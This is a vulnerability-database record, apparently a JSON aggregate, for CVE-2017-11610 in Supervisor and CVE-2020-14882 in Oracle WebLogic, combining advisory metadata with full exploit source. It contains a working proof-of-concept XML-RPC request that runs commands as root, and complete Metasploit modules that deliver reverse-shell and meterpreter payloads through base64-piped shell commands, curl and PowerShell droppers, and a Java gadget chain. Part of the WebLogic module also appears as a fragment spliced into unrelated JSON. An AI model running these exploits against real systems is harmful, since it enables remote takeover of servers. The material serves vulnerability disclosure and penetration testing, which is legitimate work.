"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:42:26", "type": "osv", "title": "Incorrect Default Permissions in Supervisor", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2023-03-07T05:20:54", "id": "OSV:GHSA-X7C8-4X3H-874W", "href": "https://osv.dev/vulnerability/GHSA-x7c8-4x3h-874w", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T01:08:52", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": 
"2017-08-23T14:29:00", "type": "osv", "title": "PYSEC-2017-41", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2021-07-05T00:01:27", "id": "OSV:PYSEC-2017-41", "href": "https://osv.dev/vulnerability/PYSEC-2017-41", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T11:56:42", "description": "### Vulnerability Summary\r\nThe following advisory describes an authenticated remote code execution vulnerability in Supervisor version 3.1.2 and Supervisor version 3.3.2.\r\n\r\nSupervisor is a client/server system that allows its users to monitor and control a number of processes on UNIX-like operating systems \u2013 used to control processes related to a project or a customer, and is meant to start like any other program at boot time.\r\n\r\n### Credit\r\nAn independent security researcher, Calum Hutton, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\n### Vendor response\r\nThe vendor has released patches to address this vulnerability.\r\n\r\nFor more information: https://github.com/Supervisor/supervisor/issues/964\r\n\r\nCVE: CVE-2017-11610\r\n\r\n\r\n### Vulnerability details\r\nSupervisord provides a web server, running on port 9001, that allows users to manage their processes using a web interface. 
When this server is enabled, an XMLRPC server is also enabled at :9001/RPC2\r\n\r\nAny user with access to the web interface can also send commands to the XMLRPC endpoint. Authentication may be required for access, and is determined in the config file.\r\n\r\nIt is possible to abuse the XMLRPC server to issue malicious commands (which are somewhat restricted) at the OS level as the root user, because of a lack of validation on requested XMLRPC methods.\r\n\r\nThere are two allowed namespaces for the allowed XMLRPC methods, system and supervisor, mapped to https://github.com/Supervisor/supervisor/blob/3.3.2/supervisor/xmlrpc.py#L174\r\nand https://github.com/Supervisor/supervisor/blob/3.3.2/supervisor/xmlrpc.py#L174,\r\nrespectively. Allowed methods include (snippet of the XML response to system.listMethods):\r\n```\r\n<value><string>supervisor.getPID</string></value>\r\n<value><string>supervisor.getProcessInfo</string></value>\r\n<value><string>supervisor.getState</string></value>\r\n<value><string>supervisor.getSupervisorVersion</string></value>\r\n<value><string>supervisor.getVersion</string></value>\r\n<value><string>supervisor.readLog</string></value>\r\n<value><string>supervisor.readMainLog</string></value>\r\n<value><string>supervisor.readProcessLog</string></value>\r\n<value><string>supervisor.readProcessStderrLog</string></value>\r\n<value><string>supervisor.readProcessStdoutLog</string></value>\r\n<value><string>supervisor.reloadConfig</string></value>\r\n<value><string>supervisor.removeProcessGroup</string></value>\r\n<value><string>supervisor.restart</string></value>\r\n<value><string>supervisor.sendProcessStdin</string></value>\r\n<value><string>supervisor.sendRemoteCommEvent</string></value>\r\n<value><string>supervisor.shutdown</string></value> \r\n```\r\n\r\nIt is possible to access the malicious functions by appending supervisord.options to the namespace. 
In particular, the execve function in https://github.com/Supervisor/supervisor/blob/3.3.2/supervisor/options.py#L1438 which simply calls Pythons own os.execve() function.\r\n\r\n### Proof of Concept\r\nThe following POST request triggers the vulnerability in supervisor.supervisord.options.execve function which allows an attacker to execute arbitrary commands as root.\r\n\r\nThe below payload utilises python on the target system to touch a file at /tmp/blahh:\r\n```\r\nPOST http://192.168.0.15:9001/RPC2 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/xml\r\nContent-Type: text/xml\r\nAccept-Language: en-GB,en;q=0.5\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nContent-Length: 503\r\nHost: 192.168.0.15:9001\r\n\r\n<?xml version=\"1.0\"?>\r\n<methodCall>\r\n<methodName>supervisor.supervisord.options.execve</methodName>\r\n<params>\r\n<param>\r\n<string>/usr/bin/python</string>\r\n</param>\r\n<param>\r\n<array>\r\n<data>\r\n<value><string>python</string></value>\r\n<value><string>-c</string></value>\r\n<value><string>import os; os.system(\"touch /tmp/blahh\")</string></value>\r\n</data>\r\n</array>\r\n</param>\r\n<param>\r\n<struct>\r\n</struct>\r\n</param>\r\n</params>\r\n</methodCall>\r\n```", "cvss3": {}, "published": "2017-07-27T00:00:00", "type": "seebug", "title": "Supervisor Authenticated Remote Code Execution(CVE-2017-11610)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96316", "id": "SSV:96316", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-09-28T08:45:44", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary 
commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T14:29:00", "type": "cve", "title": "CVE-2017-11610", "cwe": ["CWE-276"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:supervisord:supervisor:3.1.0", "cpe:/a:supervisord:supervisor:3.2.2", "cpe:/a:supervisord:supervisor:3.1.1", "cpe:/a:supervisord:supervisor:3.3.2", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:supervisord:supervisor:3.1.2", "cpe:/a:supervisord:supervisor:3.2.3", "cpe:/o:fedoraproject:fedora:25", "cpe:/a:supervisord:supervisor:3.3.0", "cpe:/a:supervisord:supervisor:3.3.1", "cpe:/o:fedoraproject:fedora:26", "cpe:/a:supervisord:supervisor:3.2.0", "cpe:/o:fedoraproject:fedora:24", "cpe:/a:supervisord:supervisor:3.2.1", "cpe:/a:supervisord:supervisor:3.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:redhat:cloudforms:4.5", "cpe:/a:supervisord:supervisor:3.1.3"], "id": "CVE-2017-11610", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11610", "cvss": {"score": 9.0, 
"vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:supervisord:supervisor:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:24:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:25:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:26:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:supervisord:supervisor:3.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:25:33", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). 
WebLogic's Administration Console to\n execute code as the WebLogic user.\n\n Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and\n 14.1.1.0.0 are known to be affected.\n\n Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows.\n\n Warning! Multiple sessions may be created by exploiting this vuln.\n },\n 'Author' => [\n 'voidfyoo', # Discovery\n 'Jang', # Analysis and PoC\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-14882'], # Auth bypass?\n ['CVE', '2020-14883'], # RCE?\n ['CVE', '2020-14750'], # Patch bypass\n ['EDB', '48971'], # An exploit\n ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'],\n ['URL', 'https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf']\n ],\n 'DisclosureDate' => '2020-10-20', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :curl,\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 
'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 4,\n 'DefaultOptions' => {\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(7001),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = execute_command('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.code == 200 && res.body.include?('Deploying Application')\n raise RuntimeError\n end\n\n unless res.code == 302 && res.body.include?('UnexpectedExceptionPage')\n return CheckCode::Safe('Path traversal failed.')\n end\n\n CheckCode::Vulnerable('Path traversal successful.')\n rescue RuntimeError\n vprint_error('Application is deploying, sleeping and retrying check')\n\n sleep(1)\n retry\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd, :win_cmd\n execute_command(payload.encoded)\n when :linux_dropper, :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\") unless cmd.empty?\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => aperture_science_handheld_portal_device,\n 'vars_post' => {\n 'handle' => coherence_gadget_chain(cmd)\n }\n )\n end\n\n def coherence_gadget_chain(cmd)\n <<~JAVA.tr(\"\\n\", '').gsub(' ', '')\n com.tangosol.coherence.mvel2.sh.ShellSession('\n java.lang.Runtime.getRuntime().exec(\n new java.lang.String[] {\n #{win_target? ? 
'\"cmd.exe\", \"/c\", ' : '\"/bin/sh\", \"-c\", '}\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n }\n )\n ')\n JAVA\n end\n\n def aperture_science_handheld_portal_device\n normalize_uri(target_uri.path, '/console/css/.%252e/console.portal')\n end\n\n def win_target?\n target.platform.names.first == 'Windows'\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35287", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-09-29T20:46:01", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x\nbefore 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to\nexecute arbitrary commands via a crafted XML-RPC request, related to nested\nsupervisord namespace lookups.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=870187>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T00:00:00", "type": "ubuntucve", "title": "CVE-2017-11610", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": 
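The "nested supervisord namespace lookups" named in the advisory above, and the `methodName` the Metasploit module sends, are easiest to see with a small dispatcher. The following is an added illustration, not Supervisor's source and not the module's code: it models a dotted-name XML-RPC dispatcher that walks attributes with `getattr` (the behaviour the CVE describes) beside one that accepts only an allow-listed `<namespace>.<method>` pair. Every object in it (the `supervisor` namespace, its `getPID` method, the `supervisord -> options -> warnings -> linecache -> os` chain) is a constructed stand-in, and the request body is constructed in the shape of the module's template with a harmless placeholder parameter.

```python
"""Dotted-name XML-RPC dispatch as abused by CVE-2017-11610, beside a
restricted dispatcher. Simplified model for illustration; not Supervisor's code."""
import os
import xmlrpc.client
from types import SimpleNamespace

# Method name as it appears in the Metasploit module's XML-RPC template.
EXPLOIT_METHOD = "supervisor.supervisord.options.warnings.linecache.os.system"

# Constructed request body in the shape the module sends; the parameter is a
# harmless placeholder rather than the module's base64 + nohup pipeline.
EXPLOIT_BODY = f"""<?xml version="1.0"?>
<methodCall>
  <methodName>{EXPLOIT_METHOD}</methodName>
  <params>
    <param>
      <string>id</string>
    </param>
  </params>
</methodCall>"""


class UnknownMethod(Exception):
    """Stand-in for the UNKNOWN_METHOD fault an XML-RPC server returns."""


class SupervisorNamespace:
    """Constructed stand-in for the 'supervisor' RPC namespace.  It publishes
    one method and, like the real interface object, hangs off an object graph
    that eventually reaches the os module (here built explicitly)."""

    def __init__(self):
        self.supervisord = SimpleNamespace(
            options=SimpleNamespace(
                warnings=SimpleNamespace(
                    linecache=SimpleNamespace(os=os))))

    def getPID(self):
        return 4242


ROOT = SimpleNamespace(supervisor=SupervisorNamespace())

# Explicit allow-list of what the hardened dispatcher will ever resolve.
PUBLISHED = {"supervisor": {"getPID"}}


def parse_call(body):
    """Return (method_name, params) from an XML-RPC methodCall body."""
    params, method = xmlrpc.client.loads(body)
    return method, params


def resolve_vulnerable(root, method):
    """Walk every dotted segment with getattr: the traversal the CVE describes.
    Only a leading underscore stops the walk, so any attribute chain that ends
    at a callable is reachable from the network."""
    ob = root
    for name in method.split("."):
        if name.startswith("_"):
            raise UnknownMethod(method)
        ob = getattr(ob, name, None)
        if ob is None:
            raise UnknownMethod(method)
    return ob


def resolve_hardened(root, method):
    """Accept exactly <namespace>.<method>, both taken from the allow-list.
    No attribute lookup is ever performed on an attacker-chosen name."""
    parts = method.split(".")
    if len(parts) != 2:
        raise UnknownMethod(method)
    namespace, name = parts
    if name not in PUBLISHED.get(namespace, ()):
        raise UnknownMethod(method)
    return getattr(getattr(root, namespace), name)


def dispatch(body, resolver, root=ROOT):
    """Parse a request and resolve (but deliberately not call) the target,
    so the exploit body can be examined safely.  Returns the callable, or
    None when the resolver rejects the method."""
    method, _params = parse_call(body)
    try:
        return resolver(root, method)
    except UnknownMethod:
        return None


def vulnerable_reaches_os_system(body=EXPLOIT_BODY):
    """True when the getattr-walking dispatcher resolves the body to os.system."""
    return dispatch(body, resolve_vulnerable) is os.system


if __name__ == "__main__":
    print("vulnerable resolver reaches os.system:", vulnerable_reaches_os_system())
    print("hardened resolver rejects the method:", dispatch(EXPLOIT_BODY, resolve_hardened) is None)
    print("hardened resolver still serves supervisor.getPID:", resolve_hardened(ROOT, "supervisor.getPID")())
```

The point of the hardened resolver is structural rather than a better blacklist: the underscore check in the vulnerable version is a deny-list on names, and the exploit path contains no underscored segment at all, whereas requiring exactly two segments with the method taken from a published set leaves nothing for attacker-controlled names to traverse.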
Tracker entry UB:CVE-2017-11610, <https://ubuntu.com/security/CVE-2017-11610>, last modified 2017-08-23.

### Supervisor XML-RPC Authenticated Remote Code Execution

Source: Metasploit Framework, module `exploit/linux/http/supervisor_xmlrpc_exec` (ID MSF:EXPLOIT-LINUX-HTTP-SUPERVISOR_XMLRPC_EXEC-), <https://www.rapid7.com/db/modules/exploit/linux/http/supervisor_xmlrpc_exec/>; source at <https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/supervisor_xmlrpc_exec.rb>. Published 2017-08-30, last modified 2022-04-19 (last seen 2023-01-02). CVE-2017-11610. CVSS: not scored in this listing.

This module exploits a vulnerability in the Supervisor process control software, where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.

Module source:

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Supervisor XML-RPC Authenticated Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
        can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
        The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
        may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
        configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Calum Hutton <c.e.hutton@gmx.com>'
        ],
      'References'     =>
        [
          ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
          ['URL', 'https://www.debian.org/security/2017/dsa-3942'],
          ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
          ['CVE', '2017-11610']
        ],
      'Platform'       => 'linux',
      'Targets'        =>
        [
          ['3.0a1-3.3.2', {}]
        ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'DefaultOptions' =>
        {
          'RPORT' => 9001,
          'Payload' => 'linux/x64/meterpreter/reverse_tcp',
        },
      'Privileged'     => false,
      'DisclosureDate' => '2017-07-19',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(9001),
        OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),
        OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),
        OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),
      ]
    )
  end

  def post_auth?
    true
  end

  def check_version(version)
    if version <= Rex::Version.new('3.3.2') and version >= Rex::Version.new('3.0a1')
      return true
    else
      return false
    end
  end

  def check

    print_status('Extracting version from web interface..')

    params = {
      'method' => 'GET',
      'uri' => normalize_uri('/')
    }
    if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
      print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
      params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
    end
    res = send_request_cgi(params)

    if res
      if res.code == 200
        match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
        if match
          version = Rex::Version.new(match[1])
          if check_version(version)
            print_good("Vulnerable version found: #{version}")
            return Exploit::CheckCode::Appears
          else
            print_bad("Version #{version} is not vulnerable")
            return Exploit::CheckCode::Safe
          end
        else
          print_bad('Could not extract version number from web interface')
          return Exploit::CheckCode::Unknown
        end
      elsif res.code == 401
        print_bad("Authentication failed: #{res.code} response")
        return Exploit::CheckCode::Safe
      else
        print_bad("Unexpected HTTP code: #{res.code} response")
        return Exploit::CheckCode::Unknown
      end
    else
      print_bad('Error connecting to web interface')
      return Exploit::CheckCode::Unknown
    end

  end

  def execute_command(cmd, opts = {})

    # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server
    # Credit to the following urls for the os.system() payload
    # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
    # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
    xml_payload = %{<?xml version="1.0"?>
<methodCall>
  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
  <params>
    <param>
      <string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string>
    </param>
  </params>
</methodCall>}

    # Send the XML-RPC payload via POST to the specified endpoint
    endpoint_path = target_uri.path
    print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}")

    params = {
      'method' => 'POST',
      'uri' => normalize_uri(endpoint_path),
      'ctype' => 'text/xml',
      'headers' => {'Accept' => 'text/xml'},
      'data' => xml_payload,
      'encode_params' => false
    }
    if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
      print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
      params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
    end
    return send_request_cgi(params, timeout=5)

  end

  def exploit

    res = execute_cmdstager(:linemax => 800)

    if res
      if res.code == 401
        fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response")
      elsif res.code == 404
        fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response")
      else
        fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
      end
    else
      print_good('Request returned without status code, usually indicates success. Passing to handler..')
      handler
    end

  end

end
```

### Oracle WebLogic Server Administration Console Handle RCE

Source: Metasploit Framework, module `exploit/multi/http/weblogic_admin_handle_rce` (ID MSF:EXPLOIT-MULTI-HTTP-WEBLOGIC_ADMIN_HANDLE_RCE-), <https://www.rapid7.com/db/modules/exploit/multi/http/weblogic_admin_handle_rce/>; source at <https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/weblogic_admin_handle_rce.rb>. Published 2020-11-18, last modified 2021-07-08 (last seen 2022-08-19). CVE-2020-14882. CVSS: not scored in this listing.

This module exploits a path traversal and a Java class instantiation in the handle implementation of WebLogic's Administration Console to execute code as the WebLogic user. Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 are known to be affected. Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows. Warning! Multiple sessions may be created by exploiting this vuln.

Module source:

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle WebLogic Server Administration Console Handle RCE',
        'Description' => %q{
          This module exploits a path traversal and a Java class instantiation
          in the handle implementation of WebLogic's Administration Console to
          execute code as the WebLogic user.

          Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and
          14.1.1.0.0 are known to be affected.

          Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows.

          Warning! Multiple sessions may be created by exploiting this vuln.
        },
        'Author' => [
          'voidfyoo', # Discovery
          'Jang', # Analysis and PoC
          'wvu' # Module
        ],
        'References' => [
          ['CVE', '2020-14882'], # Auth bypass?
          ['CVE', '2020-14883'], # RCE?
          ['CVE', '2020-14750'], # Patch bypass
          ['EDB', '48971'], # An exploit
          ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'],
          ['URL', 'https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf']
        ],
        'DisclosureDate' => '2020-10-20', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux', 'win'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
              }
            }
          ],
          [
